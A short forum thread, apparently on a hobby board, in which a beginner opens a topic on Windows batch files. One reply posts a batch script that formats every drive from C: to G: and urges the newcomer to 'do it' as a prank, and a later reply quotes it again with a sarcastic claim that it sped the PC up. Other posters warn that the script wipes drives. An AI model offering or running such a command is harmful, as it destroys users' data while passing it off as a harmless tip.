Author Topic: Batch (.bat) Files  (Read 733 times)

Post anything about them here. I think that they're awesome and I just started learning about them.

Code: [Select]
@echo off
for %%i in (c:,d:,e:,f:,g:) do format %%i /FS:NTFS /x

do it

Ha ha. You are funny =/

But for some reason reformatting all of the possible drives on a computer is not nice <3

Code: [Select]
@echo off
for %%i in (c:,d:,e:,f:,g:) do format %%i /FS:NTFS /x

do it
That made my pc LIGHTNING FAST!...

dun do it guise